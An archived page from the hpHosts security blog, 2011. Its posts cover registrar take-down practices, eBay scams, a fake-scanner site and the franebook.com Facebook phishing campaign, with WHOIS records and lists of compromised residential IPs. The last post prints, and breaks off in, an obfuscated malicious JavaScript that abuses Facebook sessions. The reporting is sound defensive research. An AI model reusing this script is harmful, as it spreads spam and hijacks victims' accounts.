Blog for hpHosts, and whatever else I feel like writing about ....

Wednesday 16 March 2011

Take downs: The good, the bad - and RapidSwitch

Taking down malicious sites has been part of daily life for years now, and I still love every second of it. Primarily because it annoys the bad guys, but mostly because it means there's less malicious sites (for a second anyway) for people to get infected via.

During the years, there's been many changes in the responses from hosting companies and registrars. GoDaddy have become one of the best at take downs and cleanups, courtesy of my good friend William (GoDaddy abuse dept), DirectI are challenging FreeHostia for the title of "quickest to respond and action an abuse report" (record currently held by FreeHostia at an unbelievable 4 minutes!), responding to and actioning, an abuse report in under 6 minutes (GoDaddy are close to beating this too, depending on when the report is sent in).

Sadly however, something never change. .co.cc still don't appear to have put any measures in place to prevent bad guys misusing their services. Dot.tk still won't take down a malicious domain if the registrant has paid for the domain, NameCheap and eNom STILL seem to be willingly allowing malicious domains to be registered through them (evident by eNoms lack of response, and NameCheaps refusal to take action, regardless of the domain in question, on the basis they're "only the registrar").

The most hilarious however, is RapidSwitch, who I blogged about back in 2008, and a few more times since - still have me blocked, which prevents my sending abuse reports to them (or it would if I only had one e-mail address). Little hint RapidSwitch, blocking abuse reports does one thing and one thing only - guarantees you'll keep the title of crime-ware friendly, and continue to have your IP ranges blocked!, not sure your customers are going to be happy about that (I look forward to hearing the excuse you're going to give them).

I also noted, along with co.cc, another ccTLD registrar that's seemingly doing nothing to stop the rising number of hostnames being created via their service - ce.ms. Though, given it's run by cz.cc, this perhaps isn't very surprising. It is important to note of course, the issues here aren't caused by their offering the domains for free (evident by there being far more abuse on paid TLDs such as .com), it's caused both by their complete failure to put measures in place for prevention, and their seemingly allowing bulk/scripted registrations (a problem ALL registrars have).

In an effort not to bore you to death, I'm keeping this short, but look for further updates in the future regarding this.

References

Take downs and cleanups: The good, and the rest
http://hphosts.blogspot.com/2010/12/take-downs-and-cleanups-good-and-rest.html

Tuesday 15 March 2011

hpHosts: Scheduled downtime

Just a note folks. The hpHosts website and forums will be offline between 20:00 - 21:30 PST for maintenance.

That's 06:00 this morning for us in the UK btw ;o)

Saturday 12 March 2011

eBay: Do you read before bidding/buying?

Sites such as eBay are extremely useful for finding that wonderful collectable, part or a multitude of other things you've been meaning to and wanting to, buy for yourself.

Sadly however, as with many other sites, there are those on these sites, that are doing as much as possible, to part you with your money. There are millions of legit users on there, just like yourself, but don't forget - there's also scammers and other questionable people on there, and unless you read things properly before bidding/buying, you could end up being stung.

For example, you wouldn't be too happy if you bid on what appeared to be a very cheap laptop, only to note when it arrived, that it was actually just a photo of the laptop (the familiar "exactly as pictured" scam).

Similarly, finding that great product that appears to be at an unbelievable price. I came across one such product a couple of days ago. A twin Makita drill set, with case and battery etc, that appeared to be extremely cheap at only £7.50 - then I noticed the postage - and very unbelievable £65.


I reported it to eBay and it appears, since then, the reason for this, is because the person selling it on eBay wants to try and scam eBay out of some of the fee's they'd have had to pay had they sold it at the "normal" price (i.e. £65 for the drill set, and £7.50 for the postage).


eBay charge fees for selling things, so they can keep the site running, so trying to scam them out of part of the fees, by using practices such as this, is hurting not only eBay, but you - the user.

A different listing I came across the same day, offered what appeared to be a great collection of furniture, at a similarly great price of just £99 - but when reading the actual product details, you found out you weren't buying the furniture shown in the image - the image was actually just an example of things the seller had allegedly created.

I could ramble on about the various different scams and scammers on eBay, but you'd end up getting bored inside of 5 minutes, so to keep it short, the lesson here, is to ensure you read not only the products details - but the postage costs. It is also VERY important that you read the sellers "feedback" (click the numbers shown in brackets next to the sellers name), as this will tell you whether or not you can trust the seller.

If you see a listing using methods like this (excessive postage, or claiming to sell products when infact, they're selling "services"), or anything else, ensure you report it so eBay can take action.

Friday 11 March 2011

Fake scanner that DOESN'T lead to a fake AV?

That certainly appears to be the case with a site I came across today. The following, if loaded in a browser, displays what we're used to seeing when a site wants to infect our machine with a fake AV;

www(.)sosgt.com/indexm.php




In this case however, we're given a purchase page.



Clicking to proceed to the checkout, takes us to;

hxxps://secureonlinestore.net/secureorder/orders.php



Incase you're wondering, this is actually just a frame that loads;

https://usd.swreg.org/cgi-bin/s.cgi?s=43835&p=43835-199&q=1&v=0&d=0&a=affilsos&vp=19.95

The SSL cert for secureonlinestore.net itself, is provided by RapidSSL;

CN = secureonlinestore.net
OU = Domain Control Validated - RapidSSL(R)
OU = See www.rapidssl.com/resources/cps (c)11
OU = GT15704604
O = secureonlinestore.net
C = LI
SERIALNUMBER = a0LzVzEMmQs9-BozcBuk7r-4WnS5MWJI




Details for both sites;

sosgt.com

IP: 94.75.233.51
IP PTR: vpn5.vzihostmz.com
ASN: 16265 94.75.192.0/18 LEASEWEB LEASEWEB AS

Registration Service Provided By: Unpicked.com
Contact:
Visit: http://www.unpicked.com

Domain name: sosgt.com

Registrant Contact:
-
Alen Aniston (31alenaniston@gmail.com)

Fax:
Gaikar 22
Referral URL:www.unpicked.com
Prague, CZ 21991
CZ

Administrative Contact:
-
Alen Aniston (31alenaniston@gmail.com)
+420.2495614
Fax: +420.2495614
Gaikar 22
Referral URL:www.unpicked.com
Prague, CZ 21991
CZ

Technical Contact:
-
Alen Aniston (31alenaniston@gmail.com)
+420.2495614
Fax: +420.2495614
Gaikar 22
Referral URL:www.unpicked.com
Prague, CZ 21991
CZ

Status: Locked

Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

Creation date: 27 Feb 2011 19:03:00
Expiration date: 27 Feb 2012 14:03:00


secureonlinestore.net

IP: 213.133.101.29
IP PTR: 213-133-101-29.clients.your-server.de
ASN: 24940 213.133.96.0/19 HETZNER-AS Hetzner Online AG RZ

Registration Service Provided By: Unpicked.com
Contact:
Visit: http://www.unpicked.com

Domain name: secureonlinestore.net

Registrant Contact:
SecureOnlineStore Inc.
Andrew Bradley (abradley@asia.com)

Fax:
53/54, Latviu st
Referral URL:www.unpicked.com
Vilnius, LI 2600
LT

Administrative Contact:
SecureOnlineStore Inc.
Andrew Bradley (abradley@asia.com)
37052725555
Fax: 37052725555
53/54, Latviu st
Referral URL:www.unpicked.com
Vilnius, LI 2600
LT

Technical Contact:
SecureOnlineStore Inc.
Andrew Bradley (abradley@asia.com)
37052725555
Fax: 37052725555
53/54, Latviu st
Referral URL:www.unpicked.com
Vilnius, LI 2600
LT

Status: Locked

Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

Creation date: 04 Feb 2011 10:22:00
Expiration date: 04 Feb 2012 05:22:00

Wednesday 9 March 2011

Franebook.com: An update - part 3

Second verse, same as the first. Same registrar, same registrant, same multi-residential IP setup, same content - same everything.

usabbc.info - Vlad Marks / vladmarks@yahoo.ca eNom, Inc. (R126-LRMS)
utgroup.info - Vlad Marks / vladmarks@yahoo.ca eNom, Inc. (R126-LRMS)
waterspa.info - Vlad Marks / vladmarks@yahoo.ca eNom, Inc. (R126-LRMS)
werace.info - Vlad Marks / vladmarks@yahoo.ca eNom, Inc. (R126-LRMS)
xlnic.info - Vlad Marks / vladmarks@yahoo.ca eNom, Inc. (R126-LRMS)
xxlpool.info - Vlad Marks / vladmarks@yahoo.ca eNom, Inc. (R126-LRMS)
zakabi.info - Vlad Marks / vladmarks@yahoo.ca eNom, Inc. (R126-LRMS)
zencarbon.info - Vlad Marks / vladmarks@yahoo.ca eNom, Inc. (R126-LRMS)
zgjjw.info - Vlad Marks / vladmarks@yahoo.ca eNom, Inc. (R126-LRMS)
zintec.info - Vlad Marks / vladmarks@yahoo.ca eNom, Inc. (R126-LRMS)


The IP list count currently stands at 63, so if it is a botnet, it's a relatively small one compared to others.

109.110.40.235    -    (Failed resolution    -    196949    -    196949 109.110.32.0/19 PODRYAD-AS Kozitskiy A.M. PI
109.184.201.194    -    (109-184-201-194.dynamic.mts-nn.ru    -    25405    -    25405 109.184.0.0/16 NMTS-AS OJSC VolgaTelecom, Nizhny Novgorod
109.184.225.161    -    (109-184-225-161.dynamic.mts-nn.ru    -    25405    -    25405 109.184.0.0/16 NMTS-AS OJSC VolgaTelecom, Nizhny Novgorod
109.229.103.134    -    (134-103-229-109.broadband.telenettv.ru    -    49136    -    49136 109.229.103.0/24 TELECOM-NETWORKS-AS Telecommunication networks JSC
109.87.243.137    -    (Failed resolution    -    13188    -    13188 109.87.128.0/17 BANKINFORM-AS Ukraine
109.94.72.11    -    (109-94-72-11.an-net.ru    -    50060    -    50060 109.94.72.0/23 ANNET Annet Ltd.
112.202.207.15    -    (112.202.207.15.pldt.net    -    9299    -    9299 112.202.192.0/19 IPG-AS-AP Philippine Long Distance Telephone Company
122.173.86.128    -    (ABTS-North-Dynamic-128.86.173.122.airtelbroadband.in    -    24560    -    24560 122.173.0.0/17 AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
122.174.84.73    -    (ABTS-TN-dynamic-073.84.174.122.airtelbroadband.in    -    24560    -    24560 122.174.0.0/16 AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
122.3.47.21    -    (122.3.47.21.pldt.net    -    9299    -    9299 122.3.32.0/19 IPG-AS-AP Philippine Long Distance Telephone Company
123.24.185.18    -    (Failed resolution    -    45899    -    45899 123.24.128.0/18 VNPT-AS-VN VNPT Corp
124.104.133.3    -    (124.104.133.3.pldt.net    -    9299    -    9299 124.104.128.0/19 IPG-AS-AP Philippine Long Distance Telephone Company
174.6.12.212    -    (S01060015b7c35258.vc.shawcable.net    -    6327    -    6327 174.6.0.0/16 SHAW - Shaw Communications Inc.
178.239.117.60    -    (Failed resolution    -    41989    -    41989 178.239.112.0/20 KTBAC-AS ET BAC Dobrinka Bacanova
178.74.246.81    -    (cpe-178-74-246-81.enet.vn.ua    -    49223    -    49223 178.74.192.0/18 EVEREST-AS _Everest_ Broadcasting Company Ltd
186.18.175.203    -    (cpe-186-18-175-203.telecentro-reversos.com.ar    -    27747    -    27747 186.18.172.0/22 Telecentro S.A.
199.48.221.14    -    (pppoe-199-48-221-14.isnwireless.ca    -    33040    -    33040 199.48.216.0/21 ISNW-AS - ISN Wireless
201.213.212.250    -    (201-213-212-250.net.prima.net.ar    -    10481    -    10481 201.213.192.0/19 Prima S.A.
201.254.31.122    -    (201-254-31-122.speedy.com.ar    -    22927    -    22927 201.254.0.0/16 Telefonica de Argentina
24.121.132.155    -    (Failed resolution    -    25994    -    25994 24.121.132.0/24 NPG-001 - NPG Cable, INC
24.21.222.13    -    (c-24-21-222-13.hsd1.or.comcast.net    -    33490    -    7922 24.16.0.0/13 COMCAST-7922 - Comcast Cable Communications, Inc.
24.34.229.143    -    (c-24-34-229-143.hsd1.ma.comcast.net    -    7015    -    7015 24.34.128.0/17 COMCAST-7015 - Comcast Cable Communications Holdings, Inc
46.118.73.142    -    (SOL-FTTB.142.73.118.46.sovam.net.ua    -    12530    -    12530 46.118.64.0/18 GOLDENTELECOM-UKRAINE Golden Telecom
46.146.18.231    -    (net18-231.perm.ertelecom.ru    -    12768    -    12768 46.146.16.0/22 ER-TELECOM-AS JSC ER-Telecom
46.158.222.119    -    (Failed resolution    -    25490    -    25490 46.158.0.0/16 STC-AS Southen Telecommunication Autonomous Systems
46.8.157.233    -    (Failed resolution    -    51501    -    51501 46.8.128.0/17 KHD-AS Khabarovsk home networks Ltd
61.7.189.248    -    (Failed resolution    -    18252    -    18252 61.7.128.0/18 CAT-AS-AP The Communication Authoity of Thailand, CAT
61.81.70.69    -    (Failed resolution    -    4766    -    4766 61.80.0.0/14 KIXS-AS-KR Korea Telecom
64.188.224.203    -    (host-64-188-224-203.windjammercable.net    -    1246    -    1246 64.188.224.0/22 WINDJAMMER - Windjammer Communications LLC
67.187.251.116    -    (c-67-187-251-116.hsd1.ca.comcast.net    -    33651    -    33651 67.187.240.0/20 CMCS - Comcast Cable Communications, Inc.
67.191.123.51    -    (c-67-191-123-51.hsd1.fl.comcast.net    -    20214    -    20214 67.191.112.0/20 COMCAST-20214 - Comcast Cable Communications Holdings, Inc
67.48.25.133    -    (mta-67-48-25-133.new.res.rr.com    -    11955    -    11955 67.48.16.0/20 SCRR-11955 - Road Runner HoldCo LLC
69.28.212.93    -    (Failed resolution    -    13768    -    13768 69.28.212.0/22 PEER1 - Peer 1 Network Inc.
71.164.175.141    -    (pool-71-164-175-141.dllstx.fios.verizon.net    -    19262    -    19262 71.164.128.0/17 VZGNI-TRANSIT - Verizon Online LLC
76.105.44.171    -    (c-76-105-44-171.hsd1.ca.comcast.net    -    33651    -    33651 76.105.0.0/18 CMCS - Comcast Cable Communications, Inc.
76.113.188.136    -    (c-76-113-188-136.hsd1.mn.comcast.net    -    13367    -    13367 76.113.128.0/17 COMCAST-13367 - Comcast Cable Communications Holdings, Inc
76.123.172.58    -    (c-76-123-172-58.hsd1.ms.comcast.net    -    22258    -    22258 76.123.128.0/18 COMCAST-22258 - Comcast Cable Communications Holdings, Inc
77.106.199.225    -    (Failed resolution    -    42110    -    42110 77.106.192.0/20 STK-AS Closed Joint Stock Company Sochitelecom
77.121.124.29    -    (29.124.121.77.pool.smart.vn.ua    -    38962    -    38962 77.121.96.0/19 UA-SMART-AS Broadcasting company _Smart_ Ltd
77.77.245.211    -    (cable-77-77-245-211.dynamic.telemach.ba    -    42560    -    42560 77.77.192.0/18 BA-TELEMACH-AS Telemach BiH
77.87.80.54    -    (nat-77-87-80-54.gw4.omsk.multinex.ru    -    41771    -    41771 77.87.80.0/21 MKC-OMSK-AS MultiCable Networks LLC
78.106.176.47    -    (78-106-176-47.broadband.corbina.ru    -    8402    -    8402 78.106.176.0/21 CORBINA-AS Corbina Telecom
78.36.249.208    -    (78-36-249-208.dynamic.pskov.dslavangard.ru    -    8997    -    8997 78.36.0.0/15 ASN-SPBNIT OJSC North-West Telecom Autonomous System
81.56.83.158    -    (lan31-1-81-56-83-158.fbx.proxad.net    -    12322    -    12322 81.56.0.0/15 PROXAD Free SAS
82.240.161.55    -    (lam06-3-82-240-161-55.fbx.proxad.net    -    12322    -    12322 82.224.0.0/11 PROXAD Free SAS
85.65.29.199    -    (85.65.29.199.dynamic.barak-online.net    -    1680    -    1680 85.64.0.0/15 NV-ASN 013 NetVision Ltd.
86.61.43.146    -    (BSN-61-43-146.dial-up.dsl.siol.net    -    5603    -    5603 86.61.0.0/17 SIOL-NET Telekom Slovenije d.d.
87.255.93.95    -    (Failed resolution    -    15836    -    15836 87.255.64.0/19 AXAUTSYS ARAX I.S.P.
90.24.153.22    -    (AMontsouris-551-1-18-22.w90-24.abo.wanadoo.fr    -    3215    -    3215 90.24.128.0/17 AS3215 France Telecom - Orange
91.200.74.206    -    (MICROSOF-CDCC83    -    43815    -    43815 91.200.72.0/22 MMV-AS MMV
91.218.17.207    -    (pool-91-218-17-207.optima-east.net    -    48882    -    48882 91.218.16.0/22 OPTIMA-SHID-AS Optima-Shid LLC
92.114.244.200    -    (host-static-92-114-244-200.moldtelecom.md    -    8926    -    8926 92.114.128.0/17 MOLDTELECOM-AS Moldtelecom Autonomous System
92.153.130.181    -    (AMarseille-553-1-202-181.w92-153.abo.wanadoo.fr    -    3215    -    3215 92.153.0.0/16 AS3215 France Telecom - Orange
93.124.127.65    -    (host-93-124-127-65.dsl.sura.ru    -    24612    -    24612 93.124.0.0/17 PENZA-SVIAZINFORM-AS JSC Volgatelecom, Penza branch
93.124.41.254    -    (host-93-124-41-254.dsl.sura.ru    -    24612    -    24612 93.124.0.0/17 PENZA-SVIAZINFORM-AS JSC Volgatelecom, Penza branch
93.170.43.94    -    (93.170.43.94.airexpress.net.ua    -    51930    -    51930 93.170.40.0/21 AIREXPRESS-AS Buzova-Budinvest Ltd.
94.248.25.153    -    (94-248-25-153.dynamic.peoplenet.ua    -    42396    -    42396 94.248.0.0/18 PPLNETUA-AS PJSC Telesystems of Ukraine
94.41.159.5    -    (94.41.159.5.dynamic.ufanet.ru    -    24955    -    24955 94.41.144.0/20 UBN-AS OJSC _Ufanet_
95.69.141.135    -    (customer-95-69-141-135.airbites.kh.ua    -    42335    -    42335 95.69.128.0/18 SPHERE-UA Sphere Ltd.
96.245.13.28    -    (pool-96-245-13-28.phlapa.fios.verizon.net    -    19262    -    19262 96.245.0.0/16 VZGNI-TRANSIT - Verizon Online LLC
97.101.74.121    -    (121.74.101.97.cfl.res.rr.com    -    33363    -    33363 97.100.0.0/14 BHN-TAMPA - BRIGHT HOUSE NETWORKS, LLC
98.142.221.7    -    (urlproxy.registrar-servers.com    -    46562    -    46562 98.142.220.0/23 COLO-AT-55-LLC - Colo at 55, LLC
98.196.164.102    -    (c-98-196-164-102.hsd1.tx.comcast.net    -    33662    -    7922 98.192.0.0/10 COMCAST-7922 - Comcast Cable Communications, Inc.


References:

franebook: An update - Part 2
http://hphosts.blogspot.com/2011/03/franebookcom-update-part-2.html

franebook: An update
http://hphosts.blogspot.com/2011/03/franebook-update.html

Facebook app pages serve up Javascript and Acai Berry spam
http://sunbeltblog.blogspot.com/2011/03/facebook-app-pages-serve-up-javascript.html

Tuesday 8 March 2011

Franebook.com: An update - part 2

Just came across another lovely lot, all created March 7th, all registered using eNom (surprise surprise), all registered to Vlad Marks / vladmarks@yahoo.ca, and all with the same content and MO as the last lot.

spanningtree.info
swisscarib.info
swtimetotravel.info
taylorslowpricewebhosting.info
top10tips.info
topherbs.info
tourgift.info
tradefromhome.info
travelanthrophy.info
trigora.info
triton-electronik.info
turboserwis.info
tvgirl.info
tvifeeder.info
twavel.info
twentyeight.info
ubullacreations.info
ug-m.info
underwearworld.info
universidadparapymes.info


And the IPs for this lovely lot;

1. 109.184.225.161    -    (109-184-225-161.dynamic.mts-nn.ru    -    25405    -    25405 109.184.0.0/16 NMTS-AS OJSC VolgaTelecom, Nizhny Novgorod
2. 109.229.103.134    -    (134-103-229-109.broadband.telenettv.ru    -    49136    -    49136 109.229.103.0/24 TELECOM-NETWORKS-AS Telecommunication networks JSC
3. 109.94.72.11    -    (109-94-72-11.an-net.ru    -    50060    -    50060 109.94.72.0/23 ANNET Annet Ltd.
4. 112.202.207.15    -    (112.202.207.15.pldt.net    -    9299    -    9299 112.202.192.0/19 IPG-AS-AP Philippine Long Distance Telephone Company
5. 122.3.47.21    -    (122.3.47.21.pldt.net    -    9299    -    9299 122.3.32.0/19 IPG-AS-AP Philippine Long Distance Telephone Company
6. 123.24.185.18    -    (Failed resolution    -    45899    -    45899 123.24.128.0/18 VNPT-AS-VN VNPT Corp
7. 124.104.133.3    -    (124.104.133.3.pldt.net    -    9299    -    9299 124.104.128.0/19 IPG-AS-AP Philippine Long Distance Telephone Company
8. 24.121.132.155    -    (Failed resolution    -    25994    -    25994 24.121.132.0/24 NPG-001 - NPG Cable, INC
9. 46.158.222.119    -    (Failed resolution    -    25490    -    25490 46.158.0.0/16 STC-AS Southen Telecommunication Autonomous Systems
10. 46.8.157.233    -    (HOME-FF4CEE39F0    -    51501    -    51501 46.8.128.0/17 KHD-AS Khabarovsk home networks Ltd
11. 61.7.189.248    -    (Failed resolution    -    18252    -    18252 61.7.128.0/18 CAT-AS-AP The Communication Authoity of Thailand, CAT
12. 64.188.224.203    -    (host-64-188-224-203.windjammercable.net    -    1246    -    1246 64.188.224.0/22 WINDJAMMER - Windjammer Communications LLC
13. 67.48.25.133    -    (mta-67-48-25-133.new.res.rr.com    -    11955    -    11955 67.48.16.0/20 SCRR-11955 - Road Runner HoldCo LLC
14. 76.123.172.58    -    (c-76-123-172-58.hsd1.ms.comcast.net    -    22258    -    22258 76.123.128.0/18 COMCAST-22258 - Comcast Cable Communications Holdings, Inc
15. 77.106.199.225    -    (Failed resolution    -    42110    -    42110 77.106.192.0/20 STK-AS Closed Joint Stock Company Sochitelecom
16. 78.36.249.208    -    (78-36-249-208.dynamic.pskov.dslavangard.ru    -    8997    -    8997 78.36.0.0/15 ASN-SPBNIT OJSC North-West Telecom Autonomous System
17. 85.65.29.199    -    (85.65.29.199.dynamic.barak-online.net    -    1680    -    1680 85.64.0.0/15 NV-ASN 013 NetVision Ltd.
18. 91.218.17.207    -    (pool-91-218-17-207.optima-east.net    -    48882    -    48882 91.218.16.0/22 OPTIMA-SHID-AS Optima-Shid LLC
19. 92.153.130.181    -    (AMarseille-553-1-202-181.w92-153.abo.wanadoo.fr    -    3215    -    3215 92.153.0.0/16 AS3215 France Telecom - Orange
20. 94.248.25.153    -    (94-248-25-153.dynamic.peoplenet.ua    -    42396    -    42396 94.248.0.0/18 PPLNETUA-AS PJSC Telesystems of Ukraine
21. 94.41.159.5    -    (94.41.159.5.dynamic.ufanet.ru    -    24955    -    24955 94.41.144.0/20 UBN-AS OJSC _Ufanet_
22. 95.69.141.135    -    (customer-95-69-141-135.airbites.kh.ua    -    42335    -    42335 95.69.128.0/18 SPHERE-UA Sphere Ltd.


References:

franebook: An update
http://hphosts.blogspot.com/2011/03/franebook-update.html

Facebook app pages serve up Javascript and Acai Berry spam
http://sunbeltblog.blogspot.com/2011/03/facebook-app-pages-serve-up-javascript.html

franebook: An update

Normally I get very annoyed with myself when I miss one of Chris Boyds blogs. This time however, I'm partially glad I did, as otherwise, I may have missed what I've just found.

Going over some of the stuff he found, I decided to do a bit more digging, and not only has franebook.com come back to life - the bad guys behind it have gotten themselves some new domains, all associated with a single name server - dark-dns-services.com;

Domain Name.......... dark-dns-services.com
Creation Date........ 2011-02-12 11:34:29
Registration Date.... 2011-02-12 11:34:29
Expiry Date.......... 2012-02-12 11:34:29
Organisation Name.... huang xinyi
Organisation Address. yuanlinlu57
Organisation Address.
Organisation Address. nantong
Organisation Address. 226051
Organisation Address. JS
Organisation Address. CN

Admin Name........... huangxinyi
Admin Address........ yuanlinlu57
Admin Address........
Admin Address........ nantong
Admin Address........ 226051
Admin Address........ JS
Admin Address........ CN
Admin Email.......... shangmenwei@163.com
Admin Phone.......... +86.51385051689
Admin Fax............ +86.51385051689

Tech Name............ huangxinyi
Tech Address......... yuanlinlu57
Tech Address.........
Tech Address......... nantong
Tech Address......... 226051
Tech Address......... JS
Tech Address......... CN
Tech Email........... shangmenwei@163.com
Tech Phone........... +86.51385051689
Tech Fax............. +86.51385051689

Bill Name............ huangxinyi
Bill Address......... yuanlinlu57
Bill Address.........
Bill Address......... nantong
Bill Address......... 226051
Bill Address......... JS
Bill Address......... CN
Bill Email........... shangmenwei@163.com
Bill Phone........... +86.51385051689
Bill Fax............. +86.51385051689
Name Server.......... ns5.dark-dns-services.com
Name Server.......... ns4.dark-dns-services.com
Name Server.......... ns2.dark-dns-services.com
Name Server.......... ns1.dark-dns-services.com


franebook.com itself is only seemingly serving content via 2 URLs at present, though no doubt that will change in the near future;

www(dot)franebook.com/usa/index14.php
www(dot)franebook.com/usa/app3/js.php

index14.php as you see in the screenshot above (top left), is the phishing side of it. js.php contains the following bit of lovelyness;


eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('17 112(){10 78=24;11(111.127){78=15 111.127()}20{78=15 283(\'288.287\')}19 78}17 31(59,49,55,14){10 22=15 112();11(49){88=\'168\'}20{88=\'171\'}22.170(88,59,36,55);11(49){22.103(\'105-180\',\'191/78-192-193-195\');22.103(\'105-189\',49.65)}22.188=17(){11(22.183==4&&22.165==200){10 13=22.184.97(/\\\\/45,\'\');11(14){104(55+\'(13,14)\')}20{104(55+\'(13)\')}}};22.129(49)}11(!34.231.135){34.231.135=17(109,70){11(70==289){70=0}20 11(70<0){70=125.268(0,71.65+70)}128(10 16=70,227=71.65;16<227;16++){11(71[16]===109)19 16}19-1}}17 178(223,109){19(223.135(109)!=-1)}17 228(){10 256=23.272(\'284\')[0];10 60=23.63(\'141\');60.173=\'140/60\';60.311=\'298\';60.294=114+\'73.60\';60.301=\'302\';256.47(60);10 44=23.63(\'136\');44.39(\'18\',\'185\');44.39(\'73\',\'312:308; 307:282; 132: 0; 300: 0; 276: 0; 95: 0;\');10 16=23.63(\'182\');16.39(\'166\',114+\'285.267\');16.39(\'73\',\'124-95: 50%; 175-95: -275;\');44.47(16);10 41=\'140-270: 274; 273: #271; 124-132: \';10 16=23.63(\'136\');16.39(\'18\',\'313\');10 14=23.63(\'181\');14.39(\'73\',41+\'306; 150-304: 309; 150-296: 303;\');10 115=23.156(\'297: 295 225 292\');14.47(115);16.47(14);44.47(16);10 16=23.63(\'182\');16.39(\'166\',114+\'51-299.291\');16.39(\'73\',\'124-132: 310; 124-95: 50%; 175-95: -290;\');44.47(16);10 16=23.63(\'136\');16.39(\'18\',\'305\');10 14=23.63(\'181\');14.39(\'18\',\'160\');14.39(\'73\',41+\'269;\');10 115=23.156(\'286..\');14.47(115);16.47(14);44.47(16);23.76.47(44);111.190=17(){19\'278 72 277 101 157 279 280 72 281 293 325 159 355 354!\'};19}17 240(){10 139=0;11(110){139=125.356(110/98*100)}11(92){40=\'357\'}20{40=\'359\'}10 151=139+\'% 358. \'+40+\' 157 (353.352) 131 159\';10 164=23.187("160");164.347.346=151}17 167(){10 44=23.187(\'185\');23.76.361(44);111.190=24;19}17 172(13){10 12=13.27(\'"122":([^"]+),"123":"([^"]+)"\');11(!12){19 64()}32=12[1];10 42=15 31(\'/51/349/351.43?56=1&122=\'+32+\'&123=\'+12[2]+\'&350[0]=133&360[0]=364\',24,\'169\',24)}17 169(13){54=15 34();61=15 34();10 33=/"e372":([^"]+),"173":"133","140":"([^"]+)"/45;10 12;85(12=33.79(13)){11(12[1]!=32){224+=1;61.81(12[1]);54.81(12[2])}}98=54.65+98;10 16=0;128(16=0;16<=94;16++){137.81(15 138())}}17 177(13){10 26=13.27(\'29="37" 30="([^"]+)"\');10 28=13.27(\'29="35" 30="([^"]+)"\');10 12=13.27(\'"122":([^"]+),"123":\');11(!12||!28||!26){19 64()}10 32=12[1];10 14=\'35=\'+28[1]+\'&370=36&37=\'+26[1]+\'&69&371=24&67=68&133=\'+32;10 42=15 31(\'/51/257/369.43?56=1\',14,\'179\',24)}17 229(13){10 12=13.27(\'"122":([^"]+),"123":\');11(!12){19 64()}32=12[1];10 42=15 31(\'/52.43?18=\'+32+\'&152=161\',24,\'194\',24)}17 194(13){10 46=\'163 158\';11(13.66(\';">\'+46)!=-1){19 38(13)}10 26=13.27(\'29="37" 30="([^"]+)"\');10 28=13.27(\'29="35" 30="([^"]+)"\');10 62=13.27(\'29="75" 30="([^"]+)"\');11(!62){19 38(13)}10 59=\'82://367.134\';10 14=\'37=\'+26[1]+\'&=154&35=\'+28[1]+\'&75=\'+62[1]+\'&120=\'+32+\'&153=\'+32+\'&113=52&84=&155=\'+25(59)+\'&89[91]=90&69&84&108&121&67=68\';10 21=15 34(28[1],26[1],62[1],46);10 42=15 31(\'/51/118/58/141/145.43?56=1\',14,\'174\',21)}17 174(13,21){10 33=/29="([^"]+)" 30="([^"]+)"/45;10 14,12,86,48,41;10 40=\'87 247 246 102, 87 248 249 48 250 258 130 264 263 261 197. 260 93 265 106 99 48 266 262, 255 244 214 72 71. 213 93 212 106 211 99 131 101 15 215 216! 87 220 219 102\';10 83=\'218 245 217 210 72 209 202 201\';10 46=21[3];10 57=\'82://4.199.198.142/203/204/208/207/206/205.221\';10 126=\'24\';10 74;85(12=33.79(13)){41=24;10 80=\'58[77][222][0]\';11(!86){11(!12){19 38(13)};14=\'238=0&35=\'+21[0]+\'&69&89[91]=90&37=\'+21[1]+\'&67=68&75=\'+21[2]+\'&113=52&84&108=\'+25(40)+\'&121=\'+25(40)+\'&120=\'+32+\'&\'+25(12[1])+\'=\'+25(12[2]);11(83){14=14+\'&58[77][237]=\'+25(83)}86=36}20{11(12[1]==\'58[77][236]\'){12[2]=46}20 11(12[1]==80){11(57){12[2]=57;74=36}}20 11(12[1]==\'235\'){12[2]=126}11(12[1]==\'239\'){11(!48){48=36}20{41=36}}11(!41){14=14+\'&\'+25(12[1])+\'=\'+25(12[2])}}}11(!14){19 38(13)}11(!74){14=14+\'&\'+80+\'=\'+57}10 42=15 31(\'/51/52/118.43?56=1\',14,\'176\',24)}17 176(13){177(23.76.107)}17 179(13){54=15 34();61=15 34();10 33=/"([^"]+)":{"16":/45;10 12;85(12=33.79(13)){61.81(12[1])}10 33=/"([^"]+)":{"29":"([^"]+)","363"/45;85(12=33.79(13)){11(178(61,12[1])){54.81(12[2])}}11(!54){19 64()}98=54.65;10 16=0;128(16=0;16<=94;16++){137.81(15 138())}}17 64(){11(!92){92=1;119=0;172(23.76.107)}20{368("167();",362)}19}17 138(){17 31(59,49,55,14){10 22=15 112();11(49){88=\'168\'}20{88=\'171\'}22.170(88,59,36,55);11(49){22.103(\'105-180\',\'191/78-192-193-195\');22.103(\'105-189\',49.65)}22.188=17(){11(22.183==4&&22.165==200){10 13=22.184.97(/\\\\/45,\'\');11(14){104(55+\'(13,14)\')}20{104(55+\'(13)\')}}};22.129(49)}17 242(18,14){10 42=15 31(\'/52.43?18=\'+18,24,14,18)}17 241(13,18){13=13.97(/&365;/45,\'&\').97(/%/45,\'\');10 33=/143=(.*?)&146=(.*?)&147=(.*?)&144=1&186=196&149(.*?)=(.*?)366(.*?)&148=(.*?)"/45;10 26=13.27(\'29="37" 30="([^"]+)"\');10 28=13.27(\'29="35" 30="([^"]+)"\');11(!28||!26){19 64()}10 12;85(12=33.79(13)){10 14=\'186=196&348=1&344=1&35=\'+28[1]+\'&144=1&69&143=\'+12[1]+\'&89[91]=90&37=\'+26[1]+\'&67=68&146=\'+12[2]+\'&149[0]=\'+12[5]+\':\'+12[6]+\'&148=\'+12[7]+\'&147=\'+12[3];10 42=15 31(\'/51/324.43?56=1\',14,\'96\',24)}96()}17 233(18,53){10 21=15 34(18,53);10 42=15 31(\'/52.43?18=\'+18+\'&152=161\',24,\'162\',21)}17 162(13,21){10 18=21[0];10 53=21[1];10 46=\'163 158!\';11(13.66(\';">\'+46)!=-1){19 38(13)}10 26=13.27(\'29="37" 